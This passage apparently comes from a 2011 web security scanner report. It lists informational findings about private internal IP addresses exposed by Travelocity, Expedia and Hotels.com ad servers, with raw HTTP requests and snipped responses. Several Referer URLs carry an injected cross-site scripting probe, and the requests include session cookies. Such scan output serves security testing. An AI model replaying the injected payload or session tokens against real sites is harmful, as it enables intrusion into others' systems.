Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyyc880d--%3E%3Cscript%3Ealert(1)%3C/script%3Ee0acc4fd6b7&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=96CD86B744253E4B0A2E3CFE8BABE276.p0525

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:52:20 GMT
Server: Apache
Set-Cookie: JSESSIONID=26986A4704F854DBAA5915B151FBE488.p0528; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.62
Cache-Control: max-age=1800, public
Expires: Mon, 03 Oct 2011 01:22:20 GMT
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript
Content-Length: 513


function setupLargeBottomHPU(drfAd) {    
   var advertiserRenderer = new AdvertiserRenderer(drfAd);
   var configurer = new WidgetInitializer(drfAd, advertiserRenderer);
   configurer.setup(9, 742, "TVLY
...[SNIP]...
23.57. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/scripts/script.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/scripts/script.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/scripts/script.js HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=42D836FDA1F37A442DDD521D91ED4575.p0529

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:49 GMT
Server: Apache
Set-Cookie: JSESSIONID=E7500CA14FDE215C024D31D0E17145B0.p0522; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.56
Cache-Control: max-age=1800, public
Expires: Mon, 03 Oct 2011 00:38:49 GMT
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript
Content-Length: 513


function setupLargeBottomHPU(drfAd) {    
   var advertiserRenderer = new AdvertiserRenderer(drfAd);
   var configurer = new WidgetInitializer(drfAd, advertiserRenderer);
   configurer.setup(9, 742, "TVLY
...[SNIP]...
23.58. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/styles/style.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/styles/style.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/styles/style.css HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=357224176254982816ECFF34448E5D96.p0521

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:49 GMT
Server: Apache
SERVICE_HOST: 10.8.5.55
Cache-Control: max-age=1800, public
Expires: Mon, 03 Oct 2011 00:38:49 GMT
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/css
Content-Length: 6336

#drf_popunderHPU {
   color: #000000;
   background-color: #f3ae07;
   background: #ffffff;
   width: 300px;
   height:600px;
   font-family: calibri, arial, sans-serif;
   text-align: left;
   font-size: 13p
...[SNIP]...
23.59. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/styles/style.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/styles/style.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/styles/style.css HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyyc880d--%3E%3Cscript%3Ealert(1)%3C/script%3Ee0acc4fd6b7&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=96CD86B744253E4B0A2E3CFE8BABE276.p0525

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:52:20 GMT
Server: Apache
Set-Cookie: JSESSIONID=C1A177F6DDA538A9AC81F0BDDD440587.p0523; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.57
Cache-Control: max-age=1800, public
Expires: Mon, 03 Oct 2011 01:22:20 GMT
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/css
Content-Length: 6336

#drf_popunderHPU {
   color: #000000;
   background-color: #f3ae07;
   background: #ffffff;
   width: 300px;
   height:600px;
   font-family: calibri, arial, sans-serif;
   text-align: left;
   font-size: 13p
...[SNIP]...
23.60. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/common/js/tvly/hotels.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/common/js/tvly/hotels.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/common/js/tvly/hotels.js HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyyc880d--%3E%3Cscript%3Ealert(1)%3C/script%3Ee0acc4fd6b7&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=26986A4704F854DBAA5915B151FBE488.p0528

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:52:20 GMT
Server: Apache
Set-Cookie: JSESSIONID=B4C607FC9EB01F6D0BC7B2C44D414F30.p0525; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.59
Cache-Control: max-age=1800, public
Expires: Mon, 03 Oct 2011 01:22:20 GMT
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript
Content-Length: 13952


function WidgetInitializer(drfAd, advertiserRenderer) {
   this.drfAd = drfAd;
   this.advertiserRenderer = advertiserRenderer;
}

WidgetInitializer.prototype.setup = function (advertisersNumber, w
...[SNIP]...
23.61. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/common/js/tvly/hotels.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/common/js/tvly/hotels.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/common/js/tvly/hotels.js HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=C48818E7B47F8EDDDEDEE13932368B50.p0527

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:50 GMT
Server: Apache
Set-Cookie: JSESSIONID=97DB591617D2DBD9035C58A353B0EF86.p0522; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.56
Cache-Control: max-age=1800, public
Expires: Mon, 03 Oct 2011 00:38:50 GMT
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript
Content-Length: 13952


function WidgetInitializer(drfAd, advertiserRenderer) {
   this.drfAd = drfAd;
   this.advertiserRenderer = advertiserRenderer;
}

WidgetInitializer.prototype.setup = function (advertisersNumber, w
...[SNIP]...
23.62. http://media.expedia.com/ads/travelhook/travelhook.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.expedia.com
Path:   /ads/travelhook/travelhook.js

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET /ads/travelhook/travelhook.js HTTP/1.1
Host: media.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information?chkin=10%2F04%2F2011&chkout=10%2F07%2F2011&rm1=a1&hwrqCacheKey=ccf4a420-af8b-480f-8413-efb42e880287HWRQ&hashTag=roomsAndRates&rfrr=-5517&c=d20f4232-e339-420a-bcb4-97cad88f9b0f&&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; U9Z5=0; MediaCookie=0`1034,1004,PDEST,BOS; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63

Response

HTTP/1.1 200 OK
ntCoent-Length: 25962
Content-Type: application/x-javascript
Last-Modified: Tue, 28 Jun 2011 22:31:55 GMT
Accept-Ranges: bytes
ETag: "80ffa2fe335cc1:405"
Server: Microsoft-IIS/6.0
Content-Length: 25962
Vary: Accept-Encoding
Cache-Control: max-age=900
Date: Mon, 03 Oct 2011 00:12:58 GMT
Connection: close

try
{

var th_StaticStart = new Date();
var thsver = '6.59';
var thsrn = Math.floor(Math.random() * 1000000);
var th_domain = 'extras.expedia.com';

function getEndvrTUID()
{

...[SNIP]...
   Pages["HTX_LOGIN"] = th_domain + "/Offers/js/LoginScrape.js?thsads=false";

}

       // Sams Club
if (document.URL.indexOf("travel.samsclub.com") >= 0 ||
document.URL.indexOf("10.95.13.23") >
...[SNIP]...
&pn=Confirmation";    
       Pages["HTX_ITNHEAD_STD"] = th_domain + "/Delivery/scrape.aspx?cid=1&pn=TripItinerary";    
    }
    else if (document.URL.indexOf("aarp") >= 0 ||
    document.URL.indexOf("10.96.73.221") >
...[SNIP]...
23.63. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLBOT&DEST=BOS&LANGID=1033&TILE=a2b6cae1-2502-4924-b0ae-59b5ac2019b7&ADSIZE=160x600&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYSUNTILEND=13&IPGEO=807.SANJOSE  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.hotels.com
Path:   /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLBOT&DEST=BOS&LANGID=1033&TILE=a2b6cae1-2502-4924-b0ae-59b5ac2019b7&ADSIZE=160x600&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYSUNTILEND=13&IPGEO=807.SANJOSE

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLBOT&DEST=BOS&LANGID=1033&TILE=a2b6cae1-2502-4924-b0ae-59b5ac2019b7&ADSIZE=160x600&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYSUNTILEND=13&IPGEO=807.SANJOSE HTTP/1.1
Host: media.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search/search.html?cd=10-14-11&dd=10-16-11&hid=205543&nr=1&pn=1&r=2&rl=destination%3A1401516%3APROVIDED%3APROVIDED&vt=LIST
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; SSID=BQD8fxscAAAAAAAp_YhOsO4QAin9iE4CAAAAAAAAAAAAiAmJTgCCAAABgwQAAIgJiU4BAIcAAAG0BAAAiAmJTgEA; SSSC=3.G5659051284361178800.2|130.1155:135.1204; SSRT=iAmJTgA; SESSID=1E7124089B9B31810B6A337085BAE51F.hm07tc02; channel=DC; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/14/11//10/16/11//2//MM/dd/yy//1401516"; mvthistory=185.0.0.i1%3A114.1.0%3A124.1.0.i1%3A103.4.1.i6%3A171.1.0%3A130.1.1.i2%3A48.1.0%3A97.73.1.i3%3A98.6.4%3A142.0.0.i4%3A198.2.0%3A145.0.0.i2%3A200.0.0%3A137.0.0.i2%3A108.1.0.i2%3A190.3.0%3A152.0.0.i2%3A134.0.1%3A196.1.0%3A2.2.1%3A209.0.1%3A147.6.0.i6%3A92.0.0.i1%3A121.503.0.i7%3A132.2.0.i2%3A122.1.0.i3%3A138.1.0%3A149.0.0.i1%3A104.0.1%3A195.0.0%7CHCOM_US; SSLB=1; user=RCoxODUuMC4wLmkxJTNBMTE0LjEuMCUzQTEyNC4xLjAuaTElM0ExMDMuNC4xLmk2JTNBMTcxLjEuMCUzQTEzMC4xLjEuaTIlM0E0OC4xLjAlM0E5Ny43My4xLmkzJTNBOTguNi40JTNBMTQyLjAuMC5pNCUzQTE5OC4yLjAlM0ExNDUuMC4wLmkyJTNBMjAwLjAuMCUzQTEzNy4wLjAuaTIlM0ExMDguMS4wLmkyJTNBMTkwLjMuMCUzQTE1Mi4wLjAuaTIlM0ExMzQuMC4xJTNBMTk2LjEuMCUzQTIuMi4xJTNBMjA5LjAuMSUzQTE0Ny42LjAuaTYlM0E5Mi4wLjAuaTElM0ExMjEuNTAzLjAuaTclM0ExMzIuMi4wLmkyJTNBMTIyLjEuMC5pMyUzQTEzOC4xLjAlM0ExNDkuMC4wLmkxJTNBMTA0LjAuMSUzQTE5NS4wLjAlN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MjoyMDU1NDN8MTQvMTAvMjAxMXwxNi8xMC8yMDExfDI.; SSPV=HjwAAAAAAAEAAAAAAAAAAAAAAAIAAAAAAAA; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:02:35 GMT
Server: Apache/2.2.17 (Unix) DAV/2 mod_python/3.3.1 Python/2.7.1
AdServer: chesrvdfe004:9678:1
Cache-Control: max-age=0
Expires: Mon, 03 Oct 2011 01:02:35 GMT
Pragma: no-cache
Content-Length: 1275
Content-Type: text/html

<!-- 2.0.1.68 /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLBOT&DEST=BOS&LANGID=1033&TILE=a2b6cae1-2502-4924-b0ae-59b5ac2019b7&ADSIZE=160x600&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYSUNTILEND=13&IPGEO=807.SANJOSE&tile=1bf1ec91-3b26-460b-94f6-b81376aa7784&ip=10.186.82.5 -->
...[SNIP]...
23.64. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&DEST=BOS&LANGID=1033&TILE=3125dce2-22e1-4ce3-935f-df4c7ea1656d&ADSIZE=180x280&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYSUNTILEND=13&IPGEO=807.SANJOSE  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.hotels.com
Path:   /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&DEST=BOS&LANGID=1033&TILE=3125dce2-22e1-4ce3-935f-df4c7ea1656d&ADSIZE=180x280&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYSUNTILEND=13&IPGEO=807.SANJOSE

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&DEST=BOS&LANGID=1033&TILE=3125dce2-22e1-4ce3-935f-df4c7ea1656d&ADSIZE=180x280&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYSUNTILEND=13&IPGEO=807.SANJOSE HTTP/1.1
Host: media.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search/search.html?cd=10-14-11&dd=10-16-11&hid=205543&nr=1&pn=1&r=2&rl=destination%3A1401516%3APROVIDED%3APROVIDED&vt=LIST
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; SSID=BQD8fxscAAAAAAAp_YhOsO4QAin9iE4CAAAAAAAAAAAAiAmJTgCCAAABgwQAAIgJiU4BAIcAAAG0BAAAiAmJTgEA; SSSC=3.G5659051284361178800.2|130.1155:135.1204; SSRT=iAmJTgA; SESSID=1E7124089B9B31810B6A337085BAE51F.hm07tc02; channel=DC; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/14/11//10/16/11//2//MM/dd/yy//1401516"; mvthistory=185.0.0.i1%3A114.1.0%3A124.1.0.i1%3A103.4.1.i6%3A171.1.0%3A130.1.1.i2%3A48.1.0%3A97.73.1.i3%3A98.6.4%3A142.0.0.i4%3A198.2.0%3A145.0.0.i2%3A200.0.0%3A137.0.0.i2%3A108.1.0.i2%3A190.3.0%3A152.0.0.i2%3A134.0.1%3A196.1.0%3A2.2.1%3A209.0.1%3A147.6.0.i6%3A92.0.0.i1%3A121.503.0.i7%3A132.2.0.i2%3A122.1.0.i3%3A138.1.0%3A149.0.0.i1%3A104.0.1%3A195.0.0%7CHCOM_US; SSLB=1; user=RCoxODUuMC4wLmkxJTNBMTE0LjEuMCUzQTEyNC4xLjAuaTElM0ExMDMuNC4xLmk2JTNBMTcxLjEuMCUzQTEzMC4xLjEuaTIlM0E0OC4xLjAlM0E5Ny43My4xLmkzJTNBOTguNi40JTNBMTQyLjAuMC5pNCUzQTE5OC4yLjAlM0ExNDUuMC4wLmkyJTNBMjAwLjAuMCUzQTEzNy4wLjAuaTIlM0ExMDguMS4wLmkyJTNBMTkwLjMuMCUzQTE1Mi4wLjAuaTIlM0ExMzQuMC4xJTNBMTk2LjEuMCUzQTIuMi4xJTNBMjA5LjAuMSUzQTE0Ny42LjAuaTYlM0E5Mi4wLjAuaTElM0ExMjEuNTAzLjAuaTclM0ExMzIuMi4wLmkyJTNBMTIyLjEuMC5pMyUzQTEzOC4xLjAlM0ExNDkuMC4wLmkxJTNBMTA0LjAuMSUzQTE5NS4wLjAlN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MjoyMDU1NDN8MTQvMTAvMjAxMXwxNi8xMC8yMDExfDI.; SSPV=HjwAAAAAAAEAAAAAAAAAAAAAAAIAAAAAAAA; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:00:28 GMT
Server: Apache/2.2.17 (Unix) DAV/2 mod_python/3.3.1 Python/2.7.1
AdServer: chesrvdfe002:9678:1
Cache-Control: max-age=0
Expires: Mon, 03 Oct 2011 01:00:28 GMT
Pragma: no-cache
Content-Length: 538
Content-Type: text/html

<!-- 2.0.1.68 /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&DEST=BOS&LANGID=1033&TILE=3125dce2-22e1-4ce3-935f-df4c7ea1656d&ADSIZE=180x280&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYSUNTILEND=13&IPGEO=807.SANJOSE&tile=7209306a-7609-423e-8e79-d6a540b0efaf&ip=10.186.82.5 -->
...[SNIP]...
23.65. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&DEST=BOS&LANGID=1033&TILE=caa512d6-1516-43ee-bbf3-3a77a92da226&ADSIZE=180x280&NUMCHILDREN=0&DAYSUNTILSTART=1&DAYSUNTILEND=4&IPGEO=807.SANJOSE  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.hotels.com
Path:   /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&DEST=BOS&LANGID=1033&TILE=caa512d6-1516-43ee-bbf3-3a77a92da226&ADSIZE=180x280&NUMCHILDREN=0&DAYSUNTILSTART=1&DAYSUNTILEND=4&IPGEO=807.SANJOSE

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&DEST=BOS&LANGID=1033&TILE=caa512d6-1516-43ee-bbf3-3a77a92da226&ADSIZE=180x280&NUMCHILDREN=0&DAYSUNTILSTART=1&DAYSUNTILEND=4&IPGEO=807.SANJOSE HTTP/1.1
Host: media.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SSRT=Kf2ITgA; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; SSLB=1; SSPV=EMAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAA; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUw..; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A196.1.0%3A92.0.0.i1%3A121.503.0.i7%3A195.0.0%3A104.0.1%7CHCOM_US; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:09:10 GMT
Server: Apache/2.2.17 (Unix) DAV/2 mod_python/3.3.1 Python/2.7.1
AdServer: chesrvdfe002:9678:1
Cache-Control: max-age=0
Expires: Mon, 03 Oct 2011 00:09:10 GMT
Pragma: no-cache
Content-Length: 536
Content-Type: text/html

<!-- 2.0.1.68 /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&DEST=BOS&LANGID=1033&TILE=caa512d6-1516-43ee-bbf3-3a77a92da226&ADSIZE=180x280&NUMCHILDREN=0&DAYSUNTILSTART=1&DAYSUNTILEND=4&IPGEO=807.SANJOSE&tile=b13993a9-6a8d-446c-875a-40575b17874e&ip=10.186.82.5 -->
...[SNIP]...
